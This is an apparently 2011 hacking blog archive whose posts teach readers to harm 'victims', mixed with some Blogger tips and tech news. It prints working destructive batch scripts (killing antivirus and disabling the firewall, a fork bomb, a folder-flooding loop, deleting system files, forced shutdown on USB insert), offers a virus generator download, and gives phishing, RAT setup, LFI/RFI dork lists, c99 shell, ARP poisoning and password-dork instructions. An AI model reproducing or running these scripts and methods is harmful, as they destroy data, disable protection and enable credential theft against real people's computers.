Sunday, December 25, 2011

In Shadow Batch Virus Generator


Kemampuan:
- Menginfeksi beragam ekstensi file populer
- Mengaktifkan virus ketika start up
- Mematikan berbagai proses dan service penting
- Mengganti ekstensi file dan menyebarkanya melalui file sharing
- Membuat account administrator baru, mengganti password administrator.
- Mematikan komputer otomatis, mendownload files otomatis, dll

Download Here :
http://www.mediafire.com/download.php?1hrt41lpz3t51b1

Thursday, November 17, 2011

idman Internet Download Manager


idman Internet Download Manager


Free IDM 6.07 Build 14 Serial Crack Full Download

Tuesday, November 15, 2011

Making Yahoo Phishing Site Tutorial

Hack Yahoo Accounts.

Ok friend Today I am going to show you How to Make the Yahoo! Phishing Site, with which you can easily Hack your friends and fellows, just you have to copy the following Steps.


Step 1: The First Step in Making the site is to regester an account at http://www.p4o.net/signup.php (if you have account than you can skip first 2 steps)

Monday, November 7, 2011

Download From RapidShare Without Waiting With Tucan Manager


Sites like RapidShare are a great way to quickly download files of any size, but they aren’t without their downsides. Downloaders usually need to wait for an arbitrary time before a download will begin, while advertisements for wait-free memberships look increasingly tempting. It’s not only annoying; the interface for doing so is usually downright confusing.
Skip this nonsense and get your files. Tucan Manager makes downloading files from single-click file sharing sites as simple as using BitTorrent to download files. The program bypasses the requirement to wait a minute or two before clicking on a download link, and can even queue multiple files for successive downloads if you like.

Friday, October 28, 2011

Avira Internet Security 2012 + New License Key

Avira Internet Security 2012 + New License Key

                                                     Avira internet security 2012 | 80.0 MB   

 Choose Internet Security 2012 if you:
    Regularly look up information on the web
    Access your bank accounts or investments online
    Shop in online stores or place bids at auction sites
    Make online phone calls, instant message or social network
    Use public wifi networks

Wednesday, October 26, 2011

Ubuntu 11.10 (Oneiric Ocelot) Officially Released [Download]

So after lots of Rumors about the new upcoming update of Ubuntu, Finally they've released the new Ubuntu 11.10 (Oneiric Ocelot) update for Public. Ubuntu is a Linux distribution for your desktop or server, with a fast and easy install, regular releases, a tight selection of excellent packages installed by default, every other package you can imagine available from the network, and professional technical support from Canonical Ltd and hundreds of other companies around the world.


The naming of Ubuntu 11.10 was announced on 7 March 2011 by Mark Shuttleworth. He explained that Oneiric means "dreamy", and it was scheduled to released today and now finally it's here so users can now download it.

It's also to update you that Ubuntu 11.10 does not include the classic GNOME desktop as a fall back to Unity, unlike Ubuntu 11.04 Natty Narwhal. Instead, 11.10 includes a 2D version of Unity as a fallback for computers that lack the hardware resources for the Compiz-based 3D version. Ubuntu 11.10 runs as a shell for GNOME 3 on top of GNOME 3 libraries, unlike in Ubuntu 11.04 where it ran as a shell for GNOME 2. Moreover, users will also be able to install the entire GNOME 3 stack along with GNOME Shell directly from the Ubuntu repositories, to be presented with a "GNOME 3 desktop" choice at login.
There also have been many changes made to Unity, including the placement of the Ubuntu button on the Launcher instead of on the Panel, the autohiding of the window controls (and the global menu) of maximized windows, the introduction of more transparency into the Dash (and the Panel if the Dash is opened), and the introduction of window controls for the Dash

Download Ubuntu 11.10 (Oneiric Ocelot)

Tuesday, October 4, 2011

How to disable/delete your victim's Antivirus



How to disable/delete your victim's Antivirus?

 Here i am giving you the batch program to disable or delete the antivirus in victims computer.


@ echo off

 rem --

 rem Permanently Kill Anti-Virus

 net stop “Security Center”

 netsh firewall set opmode mode=disable

 tskill /A av*

 tskill /A fire*

 tskill /A anti*

 cls

 tskill /A spy*

 tskill /A bullguard

 tskill /A PersFw

 tskill /A KAV*

 tskill /A ZONEALARM

Wednesday, September 21, 2011

How To Setup Cybergate RAT

How To Setup Cybergate RAT
 
Cybergate RAT 1.07.5

In This Tutorial You'll Learn Following:

Cybergate 1.07.5 Set Up - Download Cybergate RAT Here -- The AV Detection Is False Positives, Dont Worry.
Setting Up An No-IP
Spreading
Port Forwarding
Setting Up An No-IP Duc - Download Here!

Quick Troubleshooting: If You Cant Open The .exe Or It Wont Extract, Try Disabling Your Windows Defender And/Or AV And The Re-Download It.

Setting Up The No-IP & Client

1. Start Off By Going To; No-IP.com And Register. If You Have An Account There Already, Then Just Log In.

2. Once You've Logged In, Press "Add Host"

Sunday, August 28, 2011

LFI & RFI Goggle Dork

Now I will post about LFI & RFI, but this only dork just goggle for
 tutorials will follow. Since posting my tutorials will be step by step
 so you could control and make the webmaster thought not to
 underestimate you again, and it is definitely me too. Once again this
 is only for pendindikan course, if you abuse it the same rights and
 your risks.

!lfi submitComment.php?DOCUMENT_ROOT= submitComment.php
 !lfi index.php?option=com_beeheard&controller=
 index.php?option=com_beeheard
 !lfi index.php?option=com_arcadegames&controller= option=com_arcadegames
 !lfi index.php?option=com_flashgames&controller= "option=com_flashgames"
 !lfi /index.php?option=com_addressbook&controller= "option=com_addressbook"
 !lfi index.php?option=com_advertising&controller=
 index.php?option=com_advertising
 !lfi /index.php?option=com_cvmaker&controller= /index.php?option=com_cvmaker
 !lfi index.php?option=com_myfiles&controller=
 index.php?option=com_myfiles
 !lfi index.php?option=com_onlineexam&controller= "option=com_onlineexam"
 !lfi /index.php?option=com_joommail&controller= /index.php?option=com_joommail
 !lfi /index.php?option=com_memory&controller= "option=com_memory"
 !lfi index.php?option=com_market&controller= "?option=com_market"
 !lfi index.php?option=com_diary&controller= index.php?option=com_diary
 !lfi /index.php?option=com_worldrates&controller= option=com_worldrates
 !lfi index.php?option=com_record&controller= index.php?option=com_record
 !lfi index.php?option=com_sweetykeeper&controller=
 index.php?option=com_sweetykeeper
 !lfi index.php?option=com_wgpicasa&controller=
 index.php?option=com_wgpicasa
 !lfi /index.php?option=com_s5clanroster&view= /index.php?option=com_s5clanroster
 !lfi index.php?option=com_photobattle&view=
 index.php?option=com_photobattle
 !lfi index.php?option=com_mtfireeagle&controller=
 index.php?option=com_mtfireeagle
 !lfi index.php?option=com_lovefactory&controller=
 index.php?option=com_lovefactory
 !lfi index.php?option=com_jacomment&view= option=com_jacomment
 !lfi index.php?option=com_delicious&controller=
 index.php?option=com_delicious&controller=
 !lfi index.php?option=com_blogfactory&controller=
 index.php?option=com_blogfactory
 !lfi index.php?option=com_sebercart&view= index.php?option=com_sebercart
 !lfi index.php?option=com_jwhmcs&controller= index.php?option=com_jwhmcs
 !lfi index.php?option=com_jukebox&controller=
 index.php?option=com_jukebox
 !lfi index.php?option=com_joomlaflickr&controller=
 index.php?option=com_joomlaflickr
 !lfi index.php?option=com_hsconfig&controller=

Top 10 Security Threats of 2010

OWASP has released the list of top 10 web security threats of 2010 . The Open Web Application Security Project (OWASP) is an open community dedicated to the enhancement of all kinds of web and computer security . These are the threats which has caused the maximum damage to cyber world in 2010 . Here are these security risks .


1 SQL Injection
 Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.

2. Cross Site Scripting (XSS)

 XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

Remote File Inclusion (RFI) | Website Hacking

Before starting this tutorial, I would like to tell you about a piece of code called as  shell. There are many shells available . Lets consider a shell known as c99 shell. First download it from here.

 Now signup for a account on any free web hosting site . Say 110mb.com.  Now sign into your account,go to Filemanager, upload some files and then upload c99 shell here. Now just log out and visit the URL of  shell you uploaded.

http://username.110mb.com/shell.php

and you would find that you can manage all your directories and files without logging in your account,that is without entering your password anywhere.

Saturday, August 27, 2011

STEALING PASSWORD WITH GOOGLE HACK


Google is a treasure trove full of important information, especially for the underground world. This Potential fact can also be utilized in the data for the username and password stored on a server.

If the administrator save important data not in the complete system authentifikasi folder, then most likely be reached by the google search engine. If data is successfully steal in by the unauthorized person, then the will be in misuse.

Here, some google search syntax to crawl the password:

1. "Login: *" "password =*" filetype: xls (searching data command to the system files that are stored in Microsoft Excel)

2. allinurl: auth_user_file.txt (to find files auth_user_file.txt containing password on server)

Friday, August 26, 2011

Format HDD using Batch program and Binary codes in Notepad

If you like to format some others HDD , This tutorial will help you.   Here i am going to give you the Batch program and binary code that will format the hard disk. 

 It will be very funny if you implement it in your college or school or in your friend computer (for fun,but it will destroy the os ).

       Don't Try it on your PC.  Then you can't boot to your OS.  Then you need to install the OS.

Follow the Steps:

How to disable your victim's Mouse whenever he insert pen drive

Hi friends ,  Hacking is one of the fun .  You can attract your friends by simply doing some hacks before them.  You can also make your victims or enemies in confusion.  This article will help you to make the small fun with hack. 

 Let's come to the point.  Today i am going to guide you how to disable your victim's or friend's (whoever) mouse,whenever he inserts  pen drive.  You can call it as virus which will disable the mouse.


How we are going to do?

     We are going to create this virus using our usual Batch programming.  In this post i am not only giving you simply the code but also explanation for the Batch program.   So I hope that this post will make you happy.

How to shutdown your victim's system using pen drive

In my last post i explained you about how to create a virus which will disable the mouse whenever pen drive inserted.  In this post i will help you to make the virus to make the system turned off whenever pen drive is inserted.

Step 1:

copy this code into notepad:
@echo off
 shutdown -s -t 00

A small Introduction about Batch Programming for Hackers

 What is Batch file?
Batch files are a list of command line instructions that are "batched" together in one file. Most of the command lines can be executed within the command prompt, but batch files make the work load much easier. Batch files can be opened, copied, and edited using notepad.

 They are used for simple routines and low-level machine instruction. On Windows, many batch files can be seen within the c:\Windows directory.

 Batch files, more or less, make up the backbone of the Windows Operating System. The operating system must have access to these files and be able to add and delete instructions from them. Delete them, and you have effectively disabled the OS.

How to create a Dangerous virus using Batch programming?

In this post i am going to give you dangerous virus code which is written in Batch Programming language.

 Virus can do:
  • Copy itself into startup
  • Copy itself over one thousand times into random spots in your computer
  • Hide its self and all other created files
  • Task kill MSN, Norton, Windows Explorer, Limewire.
  • Swap the left mouse button with the right one
  • Opens alert boxes
  • Changes the time to 12:00 and shuts down the computer

Verry very Dangerous Virus Program using Batch Programming

Hi friends, here is another very very dangerous virus progrmming using Batch programming. This is very very danger than the previous virus code. So be careful than the before one.

Viruc will do:
  • Copy itself for multiple times.
  • This will disable the restore option by deleting the restore file.
  • This will disable the login option.
  • If this affect the system, then the user can't use his OS longer.
start

How to lock a folder without any software (Batch Programming)

Hi in my last post i guide you to create a batch programming to create a locker. This is very cool. You don't need to download any locker softwares. You are going to enjoy this hack.

 In my older post i explain you how to lock folder using command prompt. But in that no password option. But this is going to very cool using password.

Locker Code:

cls
 @ECHO OFF
 title Folder Locker

Fake virus for making fun with your friends

Hi friends, you probably don't want to harm your friend pc but you like to fun with them.  If you think so, then you can use this fake virus.

Fake virus what i mean?
    This is not at all virus.  This is not at all make any effect.  It just shut down your friend system for only once and show  " your facebook account is hacked"(for fun only).


What is the code?
    So far we create a lot of virus using Batch programming .  This time also we are going to use our Batch programming. 

Create a virus to make the computer freezed using Batch Programming

Now i am going to give you simple and only one line Batch code. Special about this virus is that easy to remember the code. So it will be useful to use in college or school.

This is for newbie. This virus is harmful for CPU. So be careful. Don't run this in your pc or friend pc.
Open a notepad.

copy this code to notepad:

%0|%0

Save the file with .bat extension (For eg: music.bat)

Create a virus to create a infinite folder in a drive

Hi Hackers, this batch code will very helpful for you.  This is simple and effective virus code.

 As usual open notepad.
 Copy this code to Notepad.

@echo off
 :top
 md %random%
 goto top

 @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
 md %random% is command that creating folders with random names.
 goto top – return to label :top , infinite loop


 Save the file with .bat extension(for eg: folderscreate.bat)

 That's all if you double click the file it will create a finite folder wherever the batch file is.

Virus to Delete mouse,explore,logoff using Batch Programming

Usually we write simple viruses in batch programming.  This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer.

@echo off

 @if exist c:\windows\system32\mouse del c:\windows\system32\mouse
 @if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
 copy C:\windows\
 @if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
 @if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe

 I hope that you know how to create batch programming. If you don't know please read previous posts about Batch Programming.

C++ ,Batch Virus code to disable All Hard disk

Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.

C++ Virus Code :

#include < windows.h >
 #include < fstream.h >
 #include < iostream.h >
 #include < string.h >
 #include < conio.h >
 int main()

How to send Anonymous Mail to anyone|Set up your own server

Everyone Like to send Anonymous Mail to your enemy or friend or teacher.  Here is the Hacking tutorial for you to implement that.  So i hope This will be best hack for you.

What is the Use?
 I explained you in my older post how to get ip address.  To get the ip address you need to send the mail with link.  So You can send mail to your victim with that link such that you are contacting from an organization.

For Eg:

You can say we are from Facbook,we have new feature to enable the feature visit this page.

How to do?

Thursday, August 25, 2011

Domain name hijacking


In this post, I will show you how domain names are hacked. Hacking of a domain name from it's original user is known as Domain name hijacking. Let me explain what is this.

Suppose i bought a domain name. Now i need a web host for hosting my website. 
Now how it works??


When we bought a domain name, we also get a control panel for full control on this domain name. From this control panel we point our domain to the web server where our files are actually host.
For ex- I have a domain name abc.com and i bought hosting at a server webhost.com. then for working of our website we need to setup our domain to point to our web hosting server webhost.com.

What is a Proxy Server?

What is a Proxy Server?


It is a server that sits between a client application, such as a Web browser, and a real server for which client requested. Proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services. It intercepts all requests from client to the real server to see if it can fulfill the requests itself. If not, it forwards the request to the real server.In some cases, the proxy may alter the client's request or the server's response for various purposes.
Proxy servers have two main purposes:


Improve Performance: Proxy servers can improve performance for users. This is because it saves the results of all requests for a certain amount of time. Next time if same request comes, it serves from the saved pages rather than the real server.

Remove Viruses From USB Drive Easily & Effectively:

Remove Viruses From USB Drive Easily & Effectively:


REMOVE VIRUS FROM PENDRIVE VERY EFFECTIVELY:-

There are some common virus that can spread and infect your computer through USB drives. These viruses include ‘Ravmon‘, ‘New Folder.exe‘, ‘Orkut is banned and some other common viruses. Most antivirus either do not detect these viruses or do not remove them (just quarantine them).

Here are the things to do if you want to remove these virus from your USB and want to have a virus free flash disk.

Sunday, August 21, 2011

How to list recent post titles by label


Do you want to list all or your most recent posts according to categories/labels? Well then, you’ve come to the right tutorial.
I’ve seen people use LinkList gadgets to accomplish this. However this method requires them to MANUALLY add the link (of the post) to the gadget every time they publish a post with the specified label. Not good.

Automatically add hashtags to your tweets

Hashtags are topics or categories for your tweets. They are in a way similar to (Blogger post) labels, but for Twitter. Hashtags are made up of keywords, preceded by a hash (#) symbol.
Adding a hashtag gives your tweet a potential to be picked up by people searching for that particular hashtag. Look at the example below as I hashtagged #blogspot and #tutorials to my tweet. If you were to search for either #blogspot or #tutorials using Twitter search box, then you just might see this particular tweet, together with other tweets with the same hashtags.



twitter hashtag

Adding label (category) tabs to navigation bar

How do you add a tab (on horizontal navigation bar) that shows all the posts that fall under a subject or category in Blogger?

tab display all posts that fall under a particular label category


Before I give a correct answer, let’s first see a popular-but-wrong DIY method (using Music category as an example):
  1. Create a page with “Music” as the title. “Music” tab will be added to the bar automatically. So far so good.
  2. Attempt to add music posts to the page. This is where it gets stuck, because posts can’t be added to pages.
  3. Mission failed.  

How to login to multiple accounts at the same time

Do you have more than one accounts of the same website? Google, Facebook, Yahoo or Twitter perhaps? If you do then you must’ve realized that you can’t log in to your second account without logging off from the first one. In other words you can only access one account at any one time. Frustrating isn’t it?
But hey if you are a Mozilla Firefox browser user there is good news: An add-on called Multifox allows Firefox to access websites using different accounts, simultaneously! Each account will be opened in a new Firefox window, and they won’t interfere with each other.
Multifox works by adding a Profile command (Open Link in New Identity Profile) to context menus of links and bookmarks. It also adds a command to File menu (New Identity Profile).

How To Hack bux.to and make money

Bux.to is a PTC site(Paid to click).You get paid to click on ads and visit websites. The process is easy! You simply click a link and view a website for 30 seconds to earn money.In this article i will show you on How to hack bux.to to browse ads.By using this trick you will be able to surf more ads and the most amazing part is that you will not get banned by doing this.


Here is a step by step procedure to
hack bux.to and make money:
Step 1:

First of all signup for bux.to account




Sunday, August 7, 2011

How to Hack Websites & Servers from Scratch! Step by Step Tutorial for Beginners

I'm going to provide the common methodology that is followed when hacking a machine/network/server. This tutorial will give you a good understanding & an overview about professional penetration test in a black box (attacker) point of view. It is designed to give you the idea on how an attacker can break into your system, what am gonna say will increase your awareness & will open the door for you to go out & educate yourself easily. I gathered these info from various sources and tutorials, i have changed many stuff, clarified many parts, gave some references, and put many information together. I'm still a learner & on the way to my goal. However, this won't prevent from teaching others what i have learned so far & don't worry i'm not going to provide you any info that i'm not sure about yet. It is not the best tutorial out there, but at least it is a good starter. I will speak in a hacker (attacker or blackbox) point of view. I write this tutorial for educational purposes only.
Since i'm not a native speaker, expect to see lots of grammar and spelling mistakes.

Before you hack a system, you must decide what is your goal. Are you hacking to put the system down, gaining sensitive data, breaking into the system and taking the 'root' access, screwing up the system by formatting everything in it, discover vulns & see how you can exploit them, etc ... The point is you have to decide the goal.

The most common goals are:

Monday, July 18, 2011

How to implement an ARP poisoning attack

The concept behind this is simple. ARP is the protocol that maintains network devices tables up-to-date by associating an IP address with a MAC address. The problem with ARP is that it doesn’t really care about who answered, it will gladly update the tables from whoever says so. Most of the time, it won’t even ask. So the idea behind the attack, is to send the client an ARP answer saying “hey, I’m the gateway, send stuff to me” and a second ARP answer to the real gateway saying “hey there, I’m this guy, send me his stuff”. Then you just have to relay the packets between the victim and the gateway.Those schemas are more simply to understand


In Linux, the rerouting can be done using the following iptables commands:
iptables -t nat -A PREROUTING -i  -p tcp –dport  -j REDIRECT –to-port 
iptables -t nat -D PREROUTING -i  -p tcp –dport  -j REDIRECT –to-port 







Sunday, July 17, 2011

ISI Chief - Ahmed Shuja Pasha Email ID hacked by Indian Hacker

ISI Chief - Ahmed Shuja Pasha Email ID hacked by Indian Hacker

An Indian Hacker "creatrix" Claim to hack into the email id of ISI Chief Ahmed Shuja Pasha's .The Directorate for Inter-Services Intelligence (more commonly known as Inter-Services Intelligence or

AntiSecShell v.0.5 Shell Released by underground hackers of Antisec


AntiSecShell (ASS) was built by the underground hacking community and groups like h0no, ac1db1tch3z and others who wish to remainanonymous, have helped altogether to create this new shell. It hasmany functions but most important of all - it bypasses ALL securityof web servers. It is not only a php shell it is a symbol offreedom and the anti-sec movement which we, the hacking underground, approve and support.

Jawahar Knowledge Center website Hacked & Databse leaked by PCA


Pakistan Cyber Army (PCA) admin Shak hack the website of Jawahar Knowledge Center (http://www.ieg.gov.in/)

UK Vodafone Phone Hacking method exposed

The Hacker's Choice announced a security problem with Vodafone's Mobile Phone Network today. An attacker can listen to any UK Vodafone customer's phone call. An attacker can exploit a vulnerability in

Songs.pk hacked by Indishell Against Mumbai blasts

Songs.pk hacked by Indishell Against Mumbai blasts

 

Patriotic Indian Hackers "Indishell" / Indian Cyber Army finally Strike to the Biggest Pirated Music Download Website of Bollywood Albums run by Pakistan crew.

Lady Gaga website hacked and fans details stolen by Hackers

Lady Gaga website hacked and fans details stolen by Hackers

Lady Gaga has called in police after thousands of her fans personal details were stolen from her website.
Her record label Univeral acted after the site was hacked into by US cyber attackers SwagSec.

A source said: “She’s upset and hopes police get to the bottom of how this was allowed to happen.”

Saturday, July 16, 2011

Add The Numbered Next And Previous Page Navigation Gadget Under Your Blog Posts

Once again we are trying to make it easy for people to navigate your blog.The easier it is for people to Navigate you blog the more likely it is they will stay and become return visitors.I'm sure you have seen this script used on lots of blogs and thought 'I would like that on my blog'.You probably thought adding it to your blog would be hard but once again i have a nice easy piece of code you can add to achieve the effect.

So what exactly is the page navigation widget.

Remove Label Posts Count From Blogger

How to Remove Label Posts Count From Blogger showing the count of posts in that particular category.As you have seen in categories in sidebar that always shows that how many posts are there in that category or label. As its clear from the picture below what i am trying to say.Its just simple step to remove the label count just follow the below step:-
Bowse To Settings > Edit Html > Expand Widgets

bX- error codes

bX- error codes

Are you facing problems and getting bX- error codes? Press ctrl+F and type in the error code to search a list of error codes below which are links to explanations for troubleshooting. For example, if after pressing ctrl+F keys, a little window will open and as you type in "bX-3r3e" you will find the link to bX-3r3ejc like in the screen shot below:

[Image]bbX-lgwej
bX-1us3c3
bX-1zu2vy
bX-2bdp09
bX-2f00qm
bX-2o3sed

What is CAPTCHA and How does it Work?

CAPTCHA or Captcha (pronounced as cap-ch-uh) which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart” is a type of challenge-response test to ensure that the response is only generated by humans and not by a computer. In simple words, CAPTCHA is the word verification test that you will come across the end of a sign-up form while signing up for Gmail or Yahoo account. The following image shows the typical samples of CAPTCHA.

Almost every Internet user will have an experience of CAPTCHA in their daily Internet usage, but only a few are aware of what it is and why they are used. So in this post you will find a detailed information on how CAPTCHA works and why they are used.
What Purpose does CAPTCHA Exactly Serve?

CAPTCPA is mainly used to prevent automated software (bots) from performing actions on behalf of actual humans. For example while signing up for a new email account, you will come across a CAPTCHA at the end of the sign-up form so as to ensure that the form is filled out only by a legitimate human and not by any of the automated software or a computer bot. The main goal of CAPTCHA is to put forth a test which is simple and straight forward for any human to answer but for a computer, it is almost impossible to solve.

Thursday, July 14, 2011

How to Hack Wifi or Wireless Password

Hello Friends, today i will explain you how to crack Wifi or wireless password in just 10 to 15 minutes. In my previous articles i have explained the different wireless scanning tools and scanning wireless networks using NetStumbler. Today i will explain How to Hack or Crack Wifi Password. Today's hack will be based on cracking the WEP encryption password. So guys tighten your belts for new hack and lets start hack wifi. I have also included the video at bottom of the post. So guys read on and watch ...
.
STEPS TO HACK WIFI OR WIRELESS PASSWORD

1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt).
Download Backtrack Linux Live CD from here: CLICK HERE

How To Decrypt The Password Of The Zip File


Almost everyone met with password protected winzip file.For example, you have downloaded movies or something else  from torrent  or rapidshare , and when you try to open the downloaded file  appears “Enter password for the encrypted  file”… Damn… What now…You can decrypt the password of the .rar file  with Stellar Phoenix Zip Recovery. I´ve tested and have broken password with 3 charachters for 60 seconds.
How to use Stellar Phoenix Zip Recoveryr?
You can use a dictionary attack and a brute force attack.I prefer brute force. Brute force actually means to start with a letter a and encrypting it. Then see if the encrypted strings match. If not then b, c, … until we’ve gotten . Then the encrypted strings will match and we’ll know that is the right password. Brute force attack is the slowest method of cracking, but there is no risk that you’ll not find the password. The thing about brute force is that the time of cracking rises rapidly depending on how long the password is, how many characters are being used in it and so forth.
 To crack winzip password follow
steps below 

Download Free XSS Shell v0.3.9 - (Xss)Cross Site Scripting Backdoor Tool

Only For Educational Purpose I Take No Responsibility Of Any Misuse.
XSS Shell v0.3.9 - Cross Site Scripting Backdoor Tool
XSS Shell is a powerful XSS backdoor which allows interactively getting control over a Cross-site Scripting (XSS) vulnerability in a web application. Demonstrates the real power and damage of Cross-site Scripting attacks.WHAT IS XSS SHELL ?
XSS Shell is powerful a XSS backdoor and zombie manager. This concept first presented by XSS-Proxy (XSS-Proxy: A tool for realtime XSS hijacking and control). Normally in XSS attacks attacker has one shot, in XSS Shell you can interactively send requests and get responses from victim, you can backdoor the page.
You can steal basic auth, you can bypass IP restrictions in administration panels, you can DDoS some systems with a permanent XSS vulnerability etc. Attack possibilities are limited with ideas. Basically this tool demonstrates that you can do more with XSS. FEATURES
XSS Shell has several features to gain whole access over victim. Also you can simply add your own commands.
Most of the features can enable or disabled from configuration or can be tweaked from source code.

Tuesday, June 28, 2011

List Of Free Hosting Website | Ethical Hacking

 
 
List Of Free Hosting Website | Ethical Hacking

Unlimited Bandwidth
Unlimited Webspace
Domain Hosting
PHP, FTP
Price: FREE!


there Free Web Hosting Package contains the following features:
Unlimited Data Transfer
Unlimited Disk Space
100mbps Network Connection
99.9% Uptime
Free Sub Directory ( hostultra.com/~you )
Cool yourname.vzz.net URL!
Free Subdomains ( Many domains to choose from! )
Free Domain Hosting ( yourdomain.com )
Custom Domain DNS Control ( A/CNAME/MX Records )
Browser and FTP Uploading
PHP / MySQL*
Unlimited Domains / Unlimited Subdomains
Free Search Engine Submission

Saturday, June 18, 2011

What is Social Enginering in the field of Hacking?

Social engineering is defined as the process of obtaining others passwords or personal information by the act of manipulating people rather than by breaking in or using technical cracking techniques. Here I will show you an example on how social engineering works
Example 1

Robert (Hacker) calls Michael and pretends to be a Google employee, Here is the
conversation:


Robert: Hi Michael I am Robert a Google employee

Michael: OH How are you doing?

Robert: Me fine. I am here to inform you that Google is performing a security update on all Google accounts and we therefore need to install those securities updates on

Facebook accounts of four Missouri state legislators hacked !

Internet hackers are targeting Missouri accompaniment assembly and their staff, and no one knows absolutely how or why.


Since the aldermanic affair started Jan. 5, bristles bodies on the Abode ancillary of the Capitol accept appear their Facebook accounts actuality hacked: three Republican legislators, one Democratic administrator and one Republican staffer.

Friday, June 17, 2011

UP Rajarshi Tandon Open University Allahabad Website Hacked

UP Rajarshi Tandon Open University Allahabad Website Hacked


Website of UP Rajarshi Tandon Open University Allahabad Hacked last night. Link http://www.uprtou.ac.in/

Wednesday, June 8, 2011

Anonymous Hacks FBI Contractors IRC Federal

Anonymous Hacks FBI Contractors IRC Federal


Anonymous Hackers today leak some files of IRC Federal via a  tweet. They've gotten access to contracts, internal documents, development schematics, logins and more. The Download Link released by Anonymous is http://www.mediafire.com/?twxc1nhiluwr126#1 ,106.91 MB. Mirror also available now on Torrent.

Thursday, May 26, 2011

National Informatics Centre (NIC INDIA) got hacked by Anonymous !

National Informatics Centre (NIC INDIA) got hacked by Anonymous !


National Informatics Centre (NIC INDIA) got hacked by Anonymous (India). Purpose of this defacement is just to awake the Govt of India . Anonymous now start Operation India against corruption. Anonymous are world famous activist and always fight against Injustice.

Tuesday, May 10, 2011

Web Server Hacking Techniques


Lots of people know use, configure and manage their webservers but only few of them really know how to protect their web server from getting hacked i.e making it hack proof. Today lots of websites are hosted on a dedicated web servers so it’s extremely important to make your web server hack proof in order to prevent any theft and data loss, Before I mention techniques used by hackers to compromise a web server and how you can protect your web server you should know what a web server is and how it works.
What is a webserver?
Basically a webserver is a single computer or more used to host websites, For a website to be available to every one (connected to internet) 24/7 it needs to be hosted on a webserver

Thursday, April 28, 2011

90,000 Military Email Accounts Leaked in Latest #AntiSec Attack

90,000 Military Email Accounts Leaked in Latest #AntiSec Attack


In latest tweet by AnonymousIRC , Hackers leaks 90,000 Military Email Accounts from Booz Allen Hamilton is a massive American consulting firm for #AntiSec. Anonymous call it "Military Meltdown Monday: Mangling Booz Allen Hamilton".

Monday, April 18, 2011

Flood a website with denial of service attack

What is a Denial Of Service Attack?

A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.
If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack,this one of the most used method for website hacking

Types of denial of service attacks
There are several general categories of DoS attacks.Popularly, the attacks are divided into three classes:

Monday, April 11, 2011

Brute force Password Cracking explained

Brute force is the best hacking method to an email account  as chances of getting password is very high.The methods is very simple . But this method is cumbersome. Still most hacking software use this method due to high success rate .

This is how you do it. All that you need is the username and findout what is the max password length the software/site allows and also the minimum. say the minimum is 6 and max is 8. You have to start trying out all the combination.First all the six letter combos then seven then 8

aaaaaa

aaaaab

aaaaac

Sunday, April 3, 2011

Ani-Shell v1.0 - PHP shell with features like Mass-Mailer , Fuzzer , DDoser by lionaneesh

Ani-Shell v1.0 - PHP shell with features like Mass-Mailer , Fuzzer , DDoser by lionaneesh


Ani-Shell is a simple PHP shell with some unique features like Mass Mailer , A simple Web-Server Fuzzer , and a DDoser ! This shell has immense capabilities and have been
written with some coding standards in mind for better editing and customization.

808 Indian Websites Hacked By ZHC MongOse & ZHC Toshiro

808 Indian Websites Hacked By ZHC MongOse & ZHC Toshiro


ZHC TOSHIRO & ZHC MONGOOSE from ZHC(ZCompany Hacking Crew) defaced more that 808 Indian Websites to deliver the message Regarding their Protest in Kashmir. Check here for message and Hacked sites list. There are most of Corporate websites in hacked site list.

Warning - This article is only for education purposes, HACKING begins is not responsible for any kind of damage cause by information provide in this article.  

Monday, March 28, 2011

XSS attack on CIA (Central Itelligence Agency) Website by lionaneesh

XSS attack on CIA (Central Itelligence Agency) Website by lionaneesh


After Ddos attack on CIA (Central Itelligence Agency) website by Lulzsec, lionaneesh, an Indian hacker have found XSS Vulnerability on same site as shown. The Vulnerabile link is here . You can join Loinaneesh on Twitter.

Sunday, March 20, 2011

Hacking Web Servers : Top Scan Method | Ethical Hacking



 Hacking Web Servers : Top Scan Method | Ethical Hacking

This method will scan the web server for the top 20 vulnerabilities list published by SANS/FBI (www.sans.org)

Hacking Tool: WebInspect
  • WebInspect is an impressive Web server and application-level vulnerability scanner which scans over 1500 known attacks.
  • It checks site contents and analyzes for rudimentary application-issues like smart guesswork checks, password guessing, parameter passing, and hidden parameter checks.
  • It can analyze a basic Webserver in 4 minutes cataloging over 1500 HTML pages

Thursday, February 24, 2011

Anonymous & Lulzsec Personal Information leaked by TeaMp0isoN

Anonymous & Lulzsec Personal Information leaked by TeaMp0isoN


TeaMp0isoN claim to expose the personal details of Anonymous & Lulzsec via a tweet. They posted a pastie link which contains the details of various Lulzsec members and Anonymous.

Sunday, February 20, 2011

3 websites hacked by Indian Girl Hacker - TriNitY !


Till now we was just listen about that, some Hackers (boys) do hacks and sites defacements, But wait ! Here we have an Indian Girl with codename "TriNitY" .TriNitY is I think 1st Indian hacker who is in news for defacing some websites. The list of websites hacked by her :

Wednesday, February 2, 2011

Hacking into another persons computer

The following article explains the method used for hacking into another persons computer remotely using command prompt in your network ie network computer hacking,I have also posted another article regarding computer hacking termed as How to hack a computer by netbios Hacking, which has a greater sucess rate than this method and written with relavent screen shots


Hacking into another persons computer - Method

Friday, January 28, 2011

SQL INJECTION WITH HAVIJ

 SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. According to HACKERS the most common technique to HACK a Website is SQL INJECTION. In this
